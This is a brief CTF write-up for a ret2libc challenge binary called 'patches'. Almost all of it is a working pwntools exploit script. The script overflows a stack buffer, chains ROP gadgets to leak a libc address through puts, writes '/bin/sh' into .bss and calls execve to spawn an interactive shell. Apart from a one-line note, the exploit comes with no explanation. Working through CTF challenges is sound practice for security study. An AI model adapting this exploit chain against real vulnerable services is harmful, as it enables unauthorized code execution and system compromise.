Tags: pwn ret2libc 

Rating:

Basic Ret2Libc

Note :- I did not play this CTF, Just checked challenges after the CTF is over

```CSS
#!/usr/bin/python

from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'DEBUG'
context(terminal=['tmux','new-window'])

p = process('./patches')
#p = gdb.debug('./patches','b main')
e = ELF('./patches')
libc = ELF('./libc-2.31.so')

JUNK = "A"*136

pop_rdi = e.search(asm('pop rdi; ret')).next()
pop_rsi = e.search(asm('pop rsi; pop r15; ret')).next()
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
bss = e.get_section_by_name('.bss')["sh_addr"] + 1200
main = e.symbols['main']

payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(pop_rsi) + p64(0) + p64(0) + p64(main)

p.recvuntil("> ")
p.sendline(payload)
p.sendline("/bin/sh\x00")

leak = u64(p.recvline().strip().ljust(8,'\x00'))
libc.address = leak - libc.symbols['puts']
print hex(libc.address)

execve = libc.symbols['execve']

payload = JUNK + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(0) + p64(execve)

p.recvuntil("> ")
p.sendline(payload)

p.interactive()
```